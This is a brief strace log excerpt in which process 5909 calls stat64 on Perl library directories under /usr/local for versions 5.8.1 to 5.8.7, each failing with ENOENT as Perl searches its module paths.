5909  07:11:18.716969 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfdf9760) = -1 ENOENT (No such file or directory)

5909  07:11:18.716984 stat64("/usr/local/lib/perl/5.8.7", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.716996 stat64("/usr/local/share/perl/5.8.7", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717008 stat64("/usr/local/lib/perl/5.8.6", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717026 stat64("/usr/local/share/perl/5.8.6", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717078 stat64("/usr/local/lib/perl/5.8.4", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717090 stat64("/usr/local/share/perl/5.8.4", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717116 stat64("/usr/local/lib/perl/5.8.3", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717127 stat64("/usr/local/share/perl/5.8.3", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717139 stat64("/usr/local/lib/perl/5.8.2", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717150 stat64("/usr/local/share/perl/5.8.2", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717162 stat64("/usr/local/lib/perl/5.8.1", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

5909  07:11:18.717173 stat64("/usr/local/share/perl/5.8.1", 0xbfdf98a0) = -1 ENOENT (No such file or directory)

